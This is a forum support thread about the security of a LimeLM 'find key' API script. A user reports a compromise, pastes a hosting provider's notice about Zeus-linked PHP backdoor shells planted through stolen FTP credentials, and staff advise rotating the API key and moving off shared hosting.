find key security query

I have searched the forum but couldn't see anything on this - what anti hack security is there on the find key input box? ( I have to ask as I have been hacked widely the last couple of days by a known and hard working spammer (all known to authorities) )

As a rule we assume any data coming from any user (even good users) is dirty, filthy, data. That is, nothing touches our databases without being properly cleaned and quoted. We do frequent internal security audits to ensure things like SQL injections do nothing more than be silently rejected by our system.

Now, to answer your question more directly, I'll assume you mean the "find-pkey" example in the web API. The general rules of internet security apply to that script. That is, if a hacker has access to your box (let's say through a vulnerability in Apache) then they will have access to your LimeLM API key and they can do anything they want with your account. We monitor for odd behavior like this on our end.

If your server is secure (you're using the latest patched versions of all your software) then the script will be fine. That is, there are no vulnerabilities in the script.

Thanks Wyatt, this is what happened, the host says it is due to malware on my pc, but norton runs clean.===================

Backdoor shells known to be associated with a variant of the zeus crimeware botnet have been found to exist amongst the web files stored under your user(s) as of 05/02/2011 :

(my user name)

The shell(s) , a primary feature of an advanced threat malware attack, have been permanantly deleted from your users files. Using FTP credentials harvested by a botnet from malware on user PCs a criminal malware gang is uploading backdoor hacker shells to victimized users, recording the location that their 28278 byte sized Base 64 encoded PHP shell is located and then a month or more later hitting the shell via precise HTTP requests , injecting a blackhat SEO or Malware payload into the code of sites under the above listed user(s).

If they have access to your server then they have access to all passwords and keys you have stored there. So the first thing you should do is change your LimeLM API key on your settings page. Click the "Generate new key" button.

More generally you should consider moving off of "shared" hosting. Shared hosting is notoriously insecure because you're only as secure as the weakest piece of software running across all the hundreds of thousands of sites running on a shared host.

Reply
Discard post